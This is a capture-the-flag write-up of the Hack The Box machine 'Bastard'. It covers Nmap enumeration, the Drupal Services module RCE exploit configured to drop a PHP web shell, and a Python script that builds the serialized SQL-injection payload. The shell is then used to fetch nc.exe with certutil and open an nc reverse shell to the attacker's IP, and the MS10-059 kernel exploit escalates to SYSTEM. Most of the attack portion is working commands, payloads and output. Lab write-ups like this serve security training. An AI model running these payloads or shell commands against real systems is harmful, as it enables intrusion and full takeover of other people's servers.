Enumeration
Nmap scan
# Nmap 7.94 scan initiated Wed Nov 8 04:55:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bastard/results/10.10.10.9/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bastard/results/10.10.10.9/scans/xml/_quick_tcp_nmap.xml 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up, received user-set (0.31s latency).
Scanned at 2023-11-08 04:55:38 EST for 99s
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-title: Welcome to Bastard | Bastard
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 8 04:57:17 2023 -- 1 IP address (1 host up) scanned in 105.57 seconds
Searchsploit lists many exploits for Drupal 7, and one of them sent us down a rabbit hole. I'll write about the one that worked:
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
The one that worked is 41564, the Services module REST endpoint RCE.
We can also get it from
https://raw.githubusercontent.com/allyshka/exploits/master/drupal/41564.php
We modify the following sections: the target URL, the Services REST endpoint path and machine name, and the file the exploit writes:
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
'filename' => 'shell4.php',
'data' => '<?php echo system($_GET["cmd"]);; ?>'
];
We run the exploit and can see the file is written:
╰─$ php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
# Exploit Editor: aLLy (@iamsecurity)
#!/usr/bin/php
You can use:
41564.php <url> <api-path> <endpoint-name>
Example:
41564.php http://drupal.pes /rest endpoint
Stage 'SQLi' sending:
a:2:{s:8:"username";O:19:"SelectQueryExtender":4:{s:8:"%00*%00query";O:17:"DatabaseCondition":5:{s:13:"%00*%00conditions";a:1:{s:12:"#conjunction";s:3:"AND";}s:12:"%00*%00arguments";a:0:{}s:10:"%00*%00changed";b:0;s:29:"%00*%00queryPlaceholderIdentifier";N;s:13:"stringVersion";s:491:"0x3a) UNION SELECT ux.uid AS uid, ux.name AS name, '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd' AS pass, ux.mail AS mail, ux.theme AS theme, (SELECT data FROM {cache} WHERE cid='services:rest_endpoint:resources') AS signature, ux.pass AS signature_format, ux.created AS created, ux.access AS access, ux.login AS login, ux.status AS status, ux.timezone AS timezone, ux.language AS language, ux.picture AS picture, ux.init AS init, ux.data AS data FROM {users} ux WHERE ux.uid<>(0";}s:19:"%00*%00uniqueIdentifier";s:8:"anything";s:13:"%00*%00connection";N;s:14:"%00*%00placeholder";i:0;}s:8:"password";s:10:"ouvreboite";}
Stored sqli post information in sqli.post
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
Stored cache_poison post information in cache_poison.post
Stage 'write file' sending:
{"filename":"shell4.php","data":"<?php echo system($_GET[\"cmd\"]);; ?>"}
Stored write post information in write.post
Stored restore_behaviour post information in restore_behaviour.post
File written: http://10.10.10.9/shell4.php
╭─kali@kali ~/HTB/bastard
╰─$
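The 'SQLi' stage payload printed above is a PHP serialized object graph, with the NUL bytes of PHP's protected-property names shown URL-encoded as %00. The Python below is an added example, not from the original post and not part of 41564.php or the Services module: a minimal PHP serialize()/unserialize() pair that rebuilds the same SelectQueryExtender / DatabaseCondition structure around an arbitrary SQL string, and reads the smuggled SQL back out of a captured payload. The class and property names and the 'ouvreboite' password come from the payload above; the shortened SQL in SAMPLE_SQL is constructed for the example, and the code assumes ASCII payloads, since PHP string lengths are byte counts.

```python
"""Added example (not from the original post nor from 41564.php): a minimal
PHP serialize()/unserialize() in Python, reproducing the object graph that the
Services module exploit sends as 'username'. Assumes ASCII payloads."""


def prot(name):
    """PHP mangles protected property names as NUL '*' NUL name (%00*%00name)."""
    return "\0*\0" + name


def php_serialize(value):
    """Serialize like PHP's serialize(): dict -> array, ("Class", {..}) -> object."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)   # byte length
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, tuple):
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)
    raise TypeError("unsupported type %r" % type(value))


def php_unserialize(data):
    """Parse a PHP serialized string; objects come back as ("Class", {...})."""
    pos = 0

    def read_until(ch):
        nonlocal pos
        end = data.index(ch, pos)
        token, pos = data[pos:end], end + 1
        return token

    def parse():
        nonlocal pos
        kind = data[pos]
        pos += 2                               # type letter plus ':' (';' for N)
        if kind == "N":
            return None
        if kind == "i":
            return int(read_until(";"))
        if kind == "b":
            return read_until(";") == "1"
        if kind == "s":
            n = int(read_until(":"))
            text = data[pos + 1:pos + 1 + n]   # skip the opening quote
            pos += n + 3                       # quote, text, quote, ';'
            return text
        if kind in "aO":
            cls = None
            if kind == "O":
                n = int(read_until(":"))
                cls = data[pos + 1:pos + 1 + n]
                pos += n + 3                   # quote, name, quote, ':'
            count = int(read_until(":"))
            pos += 1                           # '{'
            items = {}
            for _ in range(count):
                key = parse()
                items[key] = parse()
            pos += 1                           # '}'
            return items if cls is None else (cls, items)
        raise ValueError("unsupported type %r at offset %d" % (kind, pos))

    return parse()


def build_login_payload(sql, password="ouvreboite"):
    """Same shape as the exploit's 'SQLi' stage: a SelectQueryExtender whose
    query is a DatabaseCondition carrying the attacker's SQL as stringVersion,
    which Drupal's query builder later concatenates into the real query."""
    condition = ("DatabaseCondition", {
        prot("conditions"): {"#conjunction": "AND"},
        prot("arguments"): {},
        prot("changed"): False,
        prot("queryPlaceholderIdentifier"): None,
        "stringVersion": sql,
    })
    extender = ("SelectQueryExtender", {
        prot("query"): condition,
        prot("uniqueIdentifier"): "anything",
        prot("connection"): None,
        prot("placeholder"): 0,
    })
    return php_serialize({"username": extender, "password": password})


def injected_sql(payload_text):
    """Recover the smuggled SQL from a payload captured on the wire (raw NULs)
    or copied from the exploit's console output (NULs printed as %00)."""
    root = php_unserialize(payload_text.replace("%00", "\0"))
    _, extender = root["username"]
    _, condition = extender[prot("query")]
    return condition["stringVersion"]


# Constructed, shortened stand-in for the UNION SELECT in the page's payload.
SAMPLE_SQL = ("0x3a) UNION SELECT ux.uid AS uid, ux.name AS name, 'HASH' AS pass "
              "FROM {users} ux WHERE ux.uid<>(0")

if __name__ == "__main__":
    payload = build_login_payload(SAMPLE_SQL)
    print(payload.replace("\0", "%00"))        # same rendering as the exploit
    print(injected_sql(payload))
```

Running it prints a payload whose structure matches the one above byte for byte apart from the SQL, which is the point: the only thing the exploit controls is the stringVersion of a DatabaseCondition that Drupal trusts after unserialize(). The vulnerable ingredient is the REST server accepting `application/vnd.php.serialized` request bodies and passing them to unserialize(), so any Services deployment that still allows that content type is exposed regardless of the payload.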
We test with
http://10.10.10.9/shell4.php?cmd=whoami
and get the user back, so we know it works (it appears twice because system() prints the command output and echo then prints the last line system() returned):
nt authority\iusr nt authority\iusr
Now we can run commands. The first thing is to serve and upload nc.exe.
Serve the file from Kali:
╭─kali@kali ~/HTB/bastard
╰─$ ls
41564.php cache_poison.post Churraskito_exe.zip exploit.py ms.exe restore_behaviour.post session.json sqli.post Windows-Exploit-Suggester write.post
44449.rb Churraskito_exe Drupalgeddon2 JuicyPotato.exe nc.exe results shell.exe user.json winPEASx64.exe
╭─kali@kali ~/HTB/bastard
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.4.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
In the web browser, pull it down with certutil (spaces URL-encoded as %20):
http://10.10.10.9/shell4.php?cmd=certutil%20-urlcache%20-split%20-f%20http://10.10.14.16:900/nc.exe%20nc.exe
We then start a reverse shell with nc back to Kali, which is listening on port 443.
In the web browser:
http://10.10.10.9/shell4.php?cmd=nc.exe 10.10.14.16 443 -e cmd.exe
On Kali, the listener catches the shell and we are in:
╭─kali@kali ~/HTB/silo
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.9] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>
whoami
C:\inetpub\drupal-7.54>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
C:\inetpub\drupal-7.54>
I tried JuicyPotato on this but it failed. I tried it because of SeImpersonatePrivilege.
Next, systeminfo (saved locally as sys.txt for the exploit suggester):
C:\inetpub\drupal-7.54>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 10/11/2023, 1:52:00
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.600 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.618 MB
Virtual Memory: In Use: 477 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
C:\inetpub\drupal-7.54>
Checking with Windows-Exploit-Suggester (no hotfixes are installed, so every bulletin for 2008 R2 RTM comes back):
╭─kali@kali ~/HTB/bastard/Windows-Exploit-Suggester ‹master●›
╰─$ python2 windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
╭─kali@kali ~/HTB/bastard/Windows-Exploit-Suggester ‹master●›
╰─$
After trying one other, I narrowed it down to MS10-059 and found this exploit on GitHub: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
I downloaded MS10-059.exe. I had tried with the zipped one but it kept failing. I renamed it to ms.exe and served it:
41564.php cache_poison.post Churraskito_exe.zip exploit.py ms.exe restore_behaviour.post session.json sqli.post Windows-Exploit-Suggester write.post
44449.rb Churraskito_exe Drupalgeddon2 JuicyPotato.exe nc.exe results shell.exe user.json winPEASx64.exe
╭─kali@kali ~/HTB/bastard
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.4.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
On the Windows host, pull it down with certutil:
C:\temp>certutil -urlcache -split -f http://10.10.14.16:900/ms.exe c:\temp\ms.exe
certutil -urlcache -split -f http://10.10.14.16:900/ms.exe c:\temp\ms.exe
**** Online ****
000000 ...
0bf800
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\temp
10/11/2023 02:09 <DIR> .
10/11/2023 02:09 <DIR> ..
10/11/2023 02:09 784.384 ms.exe
1 File(s) 784.384 bytes
2 Dir(s) 4.101.308.416 bytes free
C:\temp>
From the Windows machine, run the exploit with our IP and the port our listener is on:
C:\temp>ms.exe 10.10.14.16 4444
ms.exe 10.10.14.16 4444
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\temp>
We get SYSTEM on our listener:
╭─kali@kali ~/HTB/bastard
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.9] 49176
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
C:\temp>